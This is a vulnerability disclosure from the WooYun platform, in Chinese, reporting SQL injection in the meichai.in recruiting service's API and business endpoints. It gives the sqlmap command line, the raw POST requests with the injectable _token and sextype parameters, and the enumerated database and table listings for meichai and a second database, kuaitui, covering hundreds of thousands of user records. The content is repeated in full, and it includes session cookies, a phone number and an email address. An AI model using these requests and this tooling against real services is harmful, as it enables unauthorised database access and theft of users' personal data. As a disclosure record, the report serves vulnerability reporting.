当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208764

漏洞标题:美差招聘SQL打包涉及57w会员信息跨库查询(貌似快推同库)

相关厂商:meichai.in

漏洞作者: 黑色键盘丶

提交时间:2016-05-18 18:26

修复时间:2016-07-02 19:50

公开时间:2016-07-02 19:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-18: 细节已通知厂商并且等待厂商处理中
2016-05-18: 厂商已经确认,细节仅向厂商公开
2016-05-28: 细节向核心白帽子及相关领域专家公开
2016-06-07: 细节向普通白帽子公开
2016-06-17: 细节向实习白帽子公开
2016-07-02: 细节向公众公开

简要描述:

RT

详细说明:

sqlmap.py -r 1.txt --dbs
---------------------------------post数据包----------_token参数----------
POST /point/exchangegoods HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Host: api.meichai.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.5.0
_appid=1001&_token=UTQmHK731469156255404032&_ts=1463230915613&_sn=d6e8756de72a7dddcf3bfb1f37d63869&goodsid=1&orderqty=1


数据库
back-end DBMS: MySQL 5.0
available databases [6]:
[*] blogrdt
[*] information_schema
[*] kuaitui
[*] meichai
[*] mysql
[*] test


当前库表信息
Database: meichai
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| sys_infcall | 8312577 |
| sys_applog | 7809269 |
| cbd_searchhist | 1811749 |
| cbd_assignhist | 1346284 |
| cbd_objevent | 711765 |
| cbd_memo | 574367 |
| acc_user | 572579 |
| acc_userlog | 572570 |
| bill_user | 572108 |
| cbd_statushist | 549533 |
| sys_inflog | 541664 |
| acc_userverify | 524598 |
| acc_userbasic | 524597 |
| bill_userpointtrans | 377614 |
| acc_peaccesslog | 361723 |
| cbd_projeventcount | 333766 |
| cbd_projevent | 329131 |
| cbd_projeventbr | 314445 |
| cbd_objtag | 288710 |
| cbd_msglist | 258346 |
| acc_userbind | 256886 |
| cbd_projeventjob | 250898 |
| acc_session | 238229 |
| sys_kv | 208622 |
| sys_appdownlog | 200446 |
| acc_userwant | 196105 |
| acc_usercontact | 188418 |
| cbd_mobileverify | 182141 |
| acc_userwantfunc | 179698 |
| acc_accesslog | 165739 |
| cbd_message | 157605 |
| cbd_projeventcontact | 154800 |
| cbd_assign | 142311 |
| acc_userwantarea | 135628 |
| acc_session_copy | 123815 |
| cbd_companyaddr | 120026 |
| sys_actcode | 112155 |
| zmobiletemp1 | 112083 |
| cbd_projeventbrcontact | 108219 |
| cbd_ordergoods | 102329 |
| cbd_orderhead | 102329 |
| cbd_userpointtask | 82780 |
| sms_sendqueue | 65537 |
| sms_phonedetail | 64551 |
| cbd_companycontact | 63183 |
| acc_userrate | 55394 |
| bill_userpoint | 53510 |
| acc_staffbasic | 47526 |
| cbd_company | 47175 |
| cbd_projrecom | 43514 |
| cbd_file | 37318 |
| cbd_objfile | 36105 |
| bill_usertrans | 33633 |
| cbd_todo | 32554 |
| bill_userpointbak | 31268 |
| acc_sharelog | 27488 |
| cbd_project | 26702 |
| t2 | 18695 |
| cbd_companyextra | 17739 |
| bill_kttrans | 16715 |
| sys_statkv | 14815 |
| bill_usertrans8 | 13636 |
| cbd_companycommentreply | 11772 |
| cbd_pushqueue2 | 11440 |
| cbd_job | 7275 |
| cbd_apply | 7024 |
| cbd_companysalarydet | 6973 |
| bill_companytrans8 | 6884 |
| cbd_apply8 | 6818 |
| cbd_exchangecode | 6161 |
| cbd_companycommentreward | 5903 |
| cbd_payqueuelog | 5897 |
| cbd_companycommentlike | 5819 |
| cbd_payqueue | 5690 |
| sys_huaming | 4500 |
| sys_nuoyaarea | 3512 |
| sys_area | 3326 |
| sys_bizarea | 3282 |
| cbd_userlotstat | 2678 |
| cbd_exportlog | 2645 |
| cbd_nuoyaverify | 2543 |
| acc_usermobile8 | 2433 |
| cbd_userexchangehist | 2359 |
| adv_applog | 2326 |
| acc_userbank8 | 2241 |
| t1 | 2166 |
| acc_usercompany8 | 2148 |
| acc_user8 | 2128 |
| acc_userset8 | 2128 |
| bill_user8 | 2128 |
| cbd_cv | 1541 |
| cbd_projrecomdet | 1531 |
| sys_industryfunc | 1321 |
| cbd_companysalaryreport | 1250 |
| sys_feedback | 1179 |
| cbd_companycomment | 1159 |
| cbd_companycommentstat | 1159 |
| sys_bankcardmap | 1085 |
| agent_invite_member | 930 |
| cbd_projeventprom | 918 |
| cbd_companyrate | 819 |
| cbd_companysalarylevel | 811 |
| sys_gencode | 690 |
| sys_funcsalary | 567 |
| cbd_action | 410 |
| sys_metro | 380 |
| cbd_channelimport | 334 |
| acc_userbank | 259 |
| cbd_companyimport | 247 |
| sys_applogdic | 217 |
| sys_function | 214 |
| zmobiletemp2 | 198 |
| cbd_actioncount | 197 |
| sys_menu | 184 |
| cbd_projeventreport | 182 |
| sys_menu111 | 148 |
| cbd_companysalaryimport | 124 |
| cbd_jobhist | 120 |
| cbd_projeventtime | 119 |
| sys_industry | 101 |
| cbd_pushqueue | 96 |
| cbd_companysalary | 92 |
| acc_userset | 87 |
| cbd_talentpool | 82 |
| cbd_qrcode | 79 |
| sys_template | 74 |
| acc_roleresource | 65 |
| sys_ids3 | 64 |
| bill_kttrans8 | 56 |
| sys_appversion | 47 |
| sys_option | 46 |
| sys_menu2 | 42 |
| cbd_citytag | 40 |
| sys_menu3 | 35 |
| sys_areamap | 31 |
| acc_qrlog | 26 |
| sys_ids | 24 |
| sys_partfunction | 21 |
| acc_userpush8 | 20 |
| cbd_recom | 19 |
| sys_bankmap | 18 |
| sys_nuoyabank | 18 |
| acc_session8 | 17 |
| bill_company8 | 17 |
| cbd_companypayset | 17 |
| acc_role | 15 |
| acc_userwork | 15 |
| cbd_companycommentreport | 15 |
| sys_ids2 | 14 |
| cbd_companygencode | 12 |
| sys_wblist | 12 |
| cbd_pointrule | 10 |
| acc_userpush | 8 |
| cbd_branchservice | 8 |
| cbd_goods | 8 |
| cbd_mcservice | 8 |
| cbd_pointtask | 8 |
| cbd_companyapp | 6 |
| sms_batch | 5 |
| sms_theme | 5 |
| sms_sendrecord | 4 |
| adv_schedule | 2 |
| adv_scheduledetail | 2 |
| cbd_projsalary | 2 |
| sys_term | 2 |
| adv_client | 1 |
| adv_place | 1 |
| bill_kt | 1 |
| bill_kt8 | 1 |
| cbd_activitytheme | 1 |
+--------------------------+---------+


垮裤查询
Database: kuaitui
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| acc_user | 280989 |
| bill_user | 280589 |
| acc_accesslog | 269991 |
| acc_userbind | 263773 |
| acc_wxid | 225985 |
| cbd_mycv | 115814 |
| cbd_wxforward | 92318 |
| sha_postmeta | 17683 |
| sha_posts | 11836 |
| sha_term_relationships | 7933 |
| acc_sharelog | 7102 |
| sys_kv | 6294 |
| cbd_jobop | 5800 |
| sys_inflog | 4423 |
| cbd_qrcode | 3164 |
| bill_usertrans | 2629 |
| sha_term_taxonomy | 2432 |
| sha_terms | 2426 |
| cbd_cvdef | 1973 |
| cbd_job | 1919 |
| cbd_assignjob | 1893 |
| cbd_myfav | 1565 |
| cbd_cvop | 1205 |
| cbd_column | 838 |
| cbd_cv | 745 |
| acc_userlog | 597 |
| cbd_cvdef_copy | 594 |
| cbd_site | 530 |
| acc_invitecode | 516 |
| cbd_qrcode_copy | 460 |
| acc_applyinvite | 412 |
| cbd_companyuser | 352 |
| bill_company | 342 |
| cbd_company | 336 |
| cbd_sitecover | 290 |
| acc_userbind2 | 260 |
| cbd_promotion | 259 |
| cbd_companyextra | 258 |
| acc_actcode | 247 |
| sys_statkv | 216 |
| sha_options | 187 |
| bill_kttrans | 179 |
| cbd_jobcv | 173 |
| cbd_chmember | 172 |
| cbd_client | 154 |
| cbd_companycert | 143 |
| bill_companytrans | 138 |
| cbd_hunter | 111 |
| cbd_executive | 104 |
| cbd_filter | 72 |
| cbd_chcom | 70 |
| cbd_columnjob | 47 |
| cbd_eventcover | 46 |
| cbd_eventjob | 46 |
| cbd_job_copy | 46 |
| bill_invinfo | 36 |
| cbd_chmemapply | 33 |
| sha_usermeta | 25 |
| sys_template | 23 |
| cbd_event | 21 |
| cbd_channel | 19 |
| cbd_companyopt | 18 |
| sys_option | 16 |
| cbd_jobrefer | 15 |
| cbd_cvmemo | 13 |
| sys_ids | 12 |
| sys_file | 11 |
| bill_cashapply | 8 |
| bill_invapply | 5 |
| cbd_eventpromotion | 4 |
| acc_subinvite | 3 |
| cbd_chmemlevel | 2 |
| bill_kt | 1 |
| opc_user | 1 |
| sha_users | 1 |
| sys_fileextra | 1 |
+------------------------+---------+


-------------post数据包-------------
POST /api/company/savecontact HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 260
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/page?_token=9LxQYm731482319550025728
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
id=63752&company=200029965&companyname=snake123&type=1&name=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&sex=%E5%A5%B3&position=11111&phone=11111&mobile=13566641461&fax=111&email=313173917%40qq.com&random=0.33943755459040403&_appid=2001&_token=9LxQYm731482319550025728
--------------------------------------------- 参数sextype---------
POST /api/resume/findtalentpools HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 315
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/main?_appid=&_token=9LxQYm731482319550025728&_ts=1463233935659
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
mode=1&wantarea1=0&wantarea2=0&wantarea=0&wantfunc1=0&wantfunc=0&jobseekstatus=0&sextype=%E5%85%A8%E9%83%A8&expryear=%E4%B8%8D%E9%99%90&degree=%E4%B8%8D%E9%99%90&minage=1&maxage=1&minsalary=1&maxsalary=111&username=1111&mobile=11&page=1&count=25&random=0.1719370405189693&_appid=2001&_token=9LxQYm731482319550025728


漏洞证明:

sqlmap.py -r 1.txt --dbs
---------------------------------post数据包----------_token参数----------
POST /point/exchangegoods HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Host: api.meichai.in
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/2.5.0
_appid=1001&_token=UTQmHK731469156255404032&_ts=1463230915613&_sn=d6e8756de72a7dddcf3bfb1f37d63869&goodsid=1&orderqty=1


数据库
back-end DBMS: MySQL 5.0
available databases [6]:
[*] blogrdt
[*] information_schema
[*] kuaitui
[*] meichai
[*] mysql
[*] test


当前库表信息
Database: meichai
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| sys_infcall | 8312577 |
| sys_applog | 7809269 |
| cbd_searchhist | 1811749 |
| cbd_assignhist | 1346284 |
| cbd_objevent | 711765 |
| cbd_memo | 574367 |
| acc_user | 572579 |
| acc_userlog | 572570 |
| bill_user | 572108 |
| cbd_statushist | 549533 |
| sys_inflog | 541664 |
| acc_userverify | 524598 |
| acc_userbasic | 524597 |
| bill_userpointtrans | 377614 |
| acc_peaccesslog | 361723 |
| cbd_projeventcount | 333766 |
| cbd_projevent | 329131 |
| cbd_projeventbr | 314445 |
| cbd_objtag | 288710 |
| cbd_msglist | 258346 |
| acc_userbind | 256886 |
| cbd_projeventjob | 250898 |
| acc_session | 238229 |
| sys_kv | 208622 |
| sys_appdownlog | 200446 |
| acc_userwant | 196105 |
| acc_usercontact | 188418 |
| cbd_mobileverify | 182141 |
| acc_userwantfunc | 179698 |
| acc_accesslog | 165739 |
| cbd_message | 157605 |
| cbd_projeventcontact | 154800 |
| cbd_assign | 142311 |
| acc_userwantarea | 135628 |
| acc_session_copy | 123815 |
| cbd_companyaddr | 120026 |
| sys_actcode | 112155 |
| zmobiletemp1 | 112083 |
| cbd_projeventbrcontact | 108219 |
| cbd_ordergoods | 102329 |
| cbd_orderhead | 102329 |
| cbd_userpointtask | 82780 |
| sms_sendqueue | 65537 |
| sms_phonedetail | 64551 |
| cbd_companycontact | 63183 |
| acc_userrate | 55394 |
| bill_userpoint | 53510 |
| acc_staffbasic | 47526 |
| cbd_company | 47175 |
| cbd_projrecom | 43514 |
| cbd_file | 37318 |
| cbd_objfile | 36105 |
| bill_usertrans | 33633 |
| cbd_todo | 32554 |
| bill_userpointbak | 31268 |
| acc_sharelog | 27488 |
| cbd_project | 26702 |
| t2 | 18695 |
| cbd_companyextra | 17739 |
| bill_kttrans | 16715 |
| sys_statkv | 14815 |
| bill_usertrans8 | 13636 |
| cbd_companycommentreply | 11772 |
| cbd_pushqueue2 | 11440 |
| cbd_job | 7275 |
| cbd_apply | 7024 |
| cbd_companysalarydet | 6973 |
| bill_companytrans8 | 6884 |
| cbd_apply8 | 6818 |
| cbd_exchangecode | 6161 |
| cbd_companycommentreward | 5903 |
| cbd_payqueuelog | 5897 |
| cbd_companycommentlike | 5819 |
| cbd_payqueue | 5690 |
| sys_huaming | 4500 |
| sys_nuoyaarea | 3512 |
| sys_area | 3326 |
| sys_bizarea | 3282 |
| cbd_userlotstat | 2678 |
| cbd_exportlog | 2645 |
| cbd_nuoyaverify | 2543 |
| acc_usermobile8 | 2433 |
| cbd_userexchangehist | 2359 |
| adv_applog | 2326 |
| acc_userbank8 | 2241 |
| t1 | 2166 |
| acc_usercompany8 | 2148 |
| acc_user8 | 2128 |
| acc_userset8 | 2128 |
| bill_user8 | 2128 |
| cbd_cv | 1541 |
| cbd_projrecomdet | 1531 |
| sys_industryfunc | 1321 |
| cbd_companysalaryreport | 1250 |
| sys_feedback | 1179 |
| cbd_companycomment | 1159 |
| cbd_companycommentstat | 1159 |
| sys_bankcardmap | 1085 |
| agent_invite_member | 930 |
| cbd_projeventprom | 918 |
| cbd_companyrate | 819 |
| cbd_companysalarylevel | 811 |
| sys_gencode | 690 |
| sys_funcsalary | 567 |
| cbd_action | 410 |
| sys_metro | 380 |
| cbd_channelimport | 334 |
| acc_userbank | 259 |
| cbd_companyimport | 247 |
| sys_applogdic | 217 |
| sys_function | 214 |
| zmobiletemp2 | 198 |
| cbd_actioncount | 197 |
| sys_menu | 184 |
| cbd_projeventreport | 182 |
| sys_menu111 | 148 |
| cbd_companysalaryimport | 124 |
| cbd_jobhist | 120 |
| cbd_projeventtime | 119 |
| sys_industry | 101 |
| cbd_pushqueue | 96 |
| cbd_companysalary | 92 |
| acc_userset | 87 |
| cbd_talentpool | 82 |
| cbd_qrcode | 79 |
| sys_template | 74 |
| acc_roleresource | 65 |
| sys_ids3 | 64 |
| bill_kttrans8 | 56 |
| sys_appversion | 47 |
| sys_option | 46 |
| sys_menu2 | 42 |
| cbd_citytag | 40 |
| sys_menu3 | 35 |
| sys_areamap | 31 |
| acc_qrlog | 26 |
| sys_ids | 24 |
| sys_partfunction | 21 |
| acc_userpush8 | 20 |
| cbd_recom | 19 |
| sys_bankmap | 18 |
| sys_nuoyabank | 18 |
| acc_session8 | 17 |
| bill_company8 | 17 |
| cbd_companypayset | 17 |
| acc_role | 15 |
| acc_userwork | 15 |
| cbd_companycommentreport | 15 |
| sys_ids2 | 14 |
| cbd_companygencode | 12 |
| sys_wblist | 12 |
| cbd_pointrule | 10 |
| acc_userpush | 8 |
| cbd_branchservice | 8 |
| cbd_goods | 8 |
| cbd_mcservice | 8 |
| cbd_pointtask | 8 |
| cbd_companyapp | 6 |
| sms_batch | 5 |
| sms_theme | 5 |
| sms_sendrecord | 4 |
| adv_schedule | 2 |
| adv_scheduledetail | 2 |
| cbd_projsalary | 2 |
| sys_term | 2 |
| adv_client | 1 |
| adv_place | 1 |
| bill_kt | 1 |
| bill_kt8 | 1 |
| cbd_activitytheme | 1 |
+--------------------------+---------+


垮裤查询
Database: kuaitui
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| acc_user | 280989 |
| bill_user | 280589 |
| acc_accesslog | 269991 |
| acc_userbind | 263773 |
| acc_wxid | 225985 |
| cbd_mycv | 115814 |
| cbd_wxforward | 92318 |
| sha_postmeta | 17683 |
| sha_posts | 11836 |
| sha_term_relationships | 7933 |
| acc_sharelog | 7102 |
| sys_kv | 6294 |
| cbd_jobop | 5800 |
| sys_inflog | 4423 |
| cbd_qrcode | 3164 |
| bill_usertrans | 2629 |
| sha_term_taxonomy | 2432 |
| sha_terms | 2426 |
| cbd_cvdef | 1973 |
| cbd_job | 1919 |
| cbd_assignjob | 1893 |
| cbd_myfav | 1565 |
| cbd_cvop | 1205 |
| cbd_column | 838 |
| cbd_cv | 745 |
| acc_userlog | 597 |
| cbd_cvdef_copy | 594 |
| cbd_site | 530 |
| acc_invitecode | 516 |
| cbd_qrcode_copy | 460 |
| acc_applyinvite | 412 |
| cbd_companyuser | 352 |
| bill_company | 342 |
| cbd_company | 336 |
| cbd_sitecover | 290 |
| acc_userbind2 | 260 |
| cbd_promotion | 259 |
| cbd_companyextra | 258 |
| acc_actcode | 247 |
| sys_statkv | 216 |
| sha_options | 187 |
| bill_kttrans | 179 |
| cbd_jobcv | 173 |
| cbd_chmember | 172 |
| cbd_client | 154 |
| cbd_companycert | 143 |
| bill_companytrans | 138 |
| cbd_hunter | 111 |
| cbd_executive | 104 |
| cbd_filter | 72 |
| cbd_chcom | 70 |
| cbd_columnjob | 47 |
| cbd_eventcover | 46 |
| cbd_eventjob | 46 |
| cbd_job_copy | 46 |
| bill_invinfo | 36 |
| cbd_chmemapply | 33 |
| sha_usermeta | 25 |
| sys_template | 23 |
| cbd_event | 21 |
| cbd_channel | 19 |
| cbd_companyopt | 18 |
| sys_option | 16 |
| cbd_jobrefer | 15 |
| cbd_cvmemo | 13 |
| sys_ids | 12 |
| sys_file | 11 |
| bill_cashapply | 8 |
| bill_invapply | 5 |
| cbd_eventpromotion | 4 |
| acc_subinvite | 3 |
| cbd_chmemlevel | 2 |
| bill_kt | 1 |
| opc_user | 1 |
| sha_users | 1 |
| sys_fileextra | 1 |
+------------------------+---------+


-------------post数据包-------------
POST /api/company/savecontact HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 260
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/page?_token=9LxQYm731482319550025728
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
id=63752&company=200029965&companyname=snake123&type=1&name=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&sex=%E5%A5%B3&position=11111&phone=11111&mobile=13566641461&fax=111&email=313173917%40qq.com&random=0.33943755459040403&_appid=2001&_token=9LxQYm731482319550025728
--------------------------------------------- 参数sextype---------
POST /api/resume/findtalentpools HTTP/1.1
Host: biz.meichai.in
Proxy-Connection: keep-alive
Content-Length: 315
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://biz.meichai.in
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://biz.meichai.in/ring/main?_appid=&_token=9LxQYm731482319550025728&_ts=1463233935659
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=9D33EE9FF34B086A5DF91D905E0B531A; JSESSIONID=7D5A93876EA2D617760AEAF093034E4E
mode=1&wantarea1=0&wantarea2=0&wantarea=0&wantfunc1=0&wantfunc=0&jobseekstatus=0&sextype=%E5%85%A8%E9%83%A8&expryear=%E4%B8%8D%E9%99%90&degree=%E4%B8%8D%E9%99%90&minage=1&maxage=1&minsalary=1&maxsalary=111&username=1111&mobile=11&page=1&count=25&random=0.1719370405189693&_appid=2001&_token=9LxQYm731482319550025728


修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-18 19:48

厂商回复:

谢谢提出者

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-16 12:41 | 爱偷懒的98 ( 普通白帽子 | Rank:154 漏洞数:52 | 从前车马邮件都很慢,一生只够爱一个人。)

    又是撞裤